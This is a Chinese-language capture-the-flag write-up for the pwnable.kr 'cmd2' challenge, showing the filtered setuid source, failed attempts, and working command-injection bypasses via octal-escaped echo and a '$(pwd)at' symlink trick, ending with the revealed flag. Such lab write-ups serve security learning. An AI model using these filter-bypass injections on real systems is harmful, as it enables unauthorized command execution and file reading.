pwnable.kr [Toddler's Bottle] - cmd2

Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

承接上题,参数过滤的内容增加了 "/" ,使得我们不能简单地通过 /bin/cat 来执行shell 。所以这里的关键是怎么样构造一个可以不含任何被过滤内容的字串,并且可以在命令执行时被解析出来。

先放上 cmd2.c 源码:

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
    int r=0;
    r += strstr(cmd, "=")!=0;
    r += strstr(cmd, "PATH")!=0;
    r += strstr(cmd, "export")!=0;
    r += strstr(cmd, "/")!=0;
    r += strstr(cmd, "`")!=0;
    r += strstr(cmd, "flag")!=0;
    return r;
}

extern char** environ;
void delete_env(){
    char** p;
    for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
    delete_env();
    putenv("PATH=/no_command_execution_until_you_become_a_hacker");
    if(filter(argv[1])) return 0;
    printf("%s\n", argv[1]);
    system( argv[1] );
    return 0;
}

笔者一开始的思路是通过 python 构造参数输入,其中命令 /bin/cat flag 先转成十六进制字符串:

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(hex(c) for c in ordlist(cmd))

再通过python传值并解析。但是由于输入时的引号限制,所以在 /tmp 目录下新建了一个自己的目录,写了一段代码尝试:


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(python -c 'print \"\\x2f\\x62\\x69\\x6e\\x2f\\x63\\x61\\x74\\x20\\x66\\x6c\\x61\\x67\"')";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这样构造的参数可以通过验证,但是还存在一个限制:

input:
$(python -c 'print "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"')
sh: 1: python: not found

因为 putenv("PATH=/no_command_execution_until_you_become_a_hacker"); 这一语句的关系,导致 python 无法被解析,所以这个思路基本上是走不通了 :(

转而想到echo,但这里 sh 并不认可 -e :(

sh: 1: -e: not found

(echo 命令不通过参数 e 也可以解析出 16 进制 和 8 进制的字串,不过不同 echo 版本会对这个功能有所限制,像笔者虚拟机 Ubuntu 16.04 的 echo 就无法解析,只有 echo -e 才能解析特殊字符),现在服务器上测试 echo 能否直接解析出 16 进制字符串:

$ echo "\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67"
\x2f\x62\x69\x6e\x2f\x63\x61\x74\x20\x66\x6c\x61\x67

看来并不行,再尝试 8 进制字串,先用 python 跑出 8 进制字串:

from pwn import *

cmd = "/bin/cat flag"
print "\\" + "\\".join(oct(c) for c in ordlist(cmd))

到 remote host 去尝试:

$ echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147"
/bin/cat flag

似乎看到了成功的希望,接下来只要 echo 被 sh “认可”就行了。
更改后的程序代码如下:


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


int main()
{
    printf("input:\n");
    char *argv[3] = {0};
    argv[0] = "/home/cmd2/cmd2";
    argv[1] = "$(echo \"\\057\\0142\\0151\\0156\\057\\0143\\0141\\0164\\040\\0146\\0154\\0141\\0147\")";
    execve("/home/cmd2/cmd2", argv, NULL);
    return 0;
}

这里还要注意当前是位于 /tmp 下的子目录,需要先 ln -s /home/cmd2/flag flag ,为 flag 文件添加一个软链接,之后编译运行:

input:
$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")
FuN_w1th_5h3ll_v4riabl3s_haha

Done.


其实这里在 /home/cmd2 目录下

$ ./cmd2 '$(echo "\057\0142\0151\0156\057\0143\0141\0164\040\0146\0154\0141\0147")'

直接运行也是一样的,不存在字符串多个引号的问题了。

另外在看别人的 writeup 时发现了一种“骚套路”:
http://blog.csdn.net/hwz2311245/article/details/50555295

首先在/tmp目录下建立自己的目录exploit,然后创建目录/tmp/exploit/c。那么,如果在/tmp/exploit/c目录下执行pwd命令就可以得到/tmp/exploit/c了。然后在/tmp/exploit下构造cat的软应用ln -s /bin/cat cat,在/tmp/exploit/c下建立flag的软引用ln -s /home/cmd2/flag flag。然后在/tmp/exploit/c下执行命令/home/cmd2/cmd2 "$(pwd)at f*"就可以得到flag了。其原理就是利用“$(pwd)at”构造出/tmp/exploit/cat命令。

$ ln -s /bin/cat cat
$ mkdir c
$ cd c
$ ln -s /home/cmd2/flag flag
$ /home/cmd2/cmd2 "\$(pwd)at f*"
$(pwd)at f*
FuN_w1th_5h3ll_v4riabl3s_haha
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 1.创建文件夹 !/bin/sh mkdir -m 777 "%%1" 2.创建文件 !/bin/sh touch...
    BigJeffWang阅读 10,186评论 3 53
  • linux资料总章2.1 1.0写的不好抱歉 但是2.0已经改了很多 但是错误还是无法避免 以后资料会慢慢更新 大...
    数据革命阅读 12,228评论 2 33
  • 为何叫做 shell ? shell prompt(PS1) 与 Carriage Return(CR) 的关系?...
    Zero___阅读 3,185评论 3 49
  • 个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,779评论 0 11
  • (一)基本命令 命令格式: 命令 参数 1.ls 显示文件名,等同于dos下dir命令 命令格式:ls [opti...
    飞羽孟德阅读 1,962评论 0 3